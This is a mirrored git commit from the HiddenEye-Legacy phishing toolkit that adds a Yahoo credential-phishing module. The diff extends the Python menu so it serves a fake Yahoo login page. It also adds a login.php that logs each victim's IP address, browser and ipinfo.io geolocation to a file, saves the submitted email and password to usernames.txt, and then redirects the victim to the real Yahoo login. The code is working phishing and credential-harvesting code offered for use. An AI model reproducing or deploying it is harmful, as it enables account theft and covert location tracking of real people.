mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #9 from usama7628674/master
yahoo_added with live victim info. THANKS TO @usama7628674
This commit is contained in:
commit
a49750b9cf
|
@ -99,6 +99,8 @@ def runPhishing(social, option2):
|
|||
system('cp WebPages/twitter/*.* Server/www/')
|
||||
elif social == 'Snapchat':
|
||||
system('cp WebPages/Snapchat_web/*.* Server/www/')
|
||||
elif social == 'Yahoo':
|
||||
system('cp WebPages/yahoo_web/*.* Server/www/')
|
||||
elif option2 == '1' and social == 'Instagram':
|
||||
system('cp WebPages/Instagram_web/*.* Server/www/')
|
||||
elif option2 == '2' and social == 'Instagram':
|
||||
|
@ -165,7 +167,7 @@ def runPEnv():
|
|||
system('clear')
|
||||
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)
|
||||
exit(0)
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
if option == '1':
|
||||
loadModule('Facebook')
|
||||
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Mobile Version(mobile_mode)\n\n {0}[{1}4{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}5{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
|
@ -201,7 +203,11 @@ def runPEnv():
|
|||
elif option == '9':
|
||||
loadModule('Snapchat')
|
||||
option2 = ''
|
||||
runPhishing('Snapchat', option2)
|
||||
runPhishing('Snapchat', option2)
|
||||
elif option == '10':
|
||||
loadModule('Yahoo')
|
||||
option2 = ''
|
||||
runPhishing('Yahoo', option2)
|
||||
else:
|
||||
exit(0)
|
||||
|
||||
|
|
389
WebPages/yahoo_web/index.html
Normal file
389
WebPages/yahoo_web/index.html
Normal file
File diff suppressed because one or more lines are too long
55
WebPages/yahoo_web/login.php
Normal file
55
WebPages/yahoo_web/login.php
Normal file
|
@ -0,0 +1,55 @@
|
|||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://login.yahoo.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
header('Location:https://login.yahoo.com');
|
||||
}
|
||||
exit();
|
||||
?>
|
||||
|
BIN
WebPages/yahoo_web/yahoo_en-US_f_p_bestfit_2x.png
Normal file
BIN
WebPages/yahoo_web/yahoo_en-US_f_p_bestfit_2x.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 3.0 KiB |
Loading…
Reference in New Issue
Block a user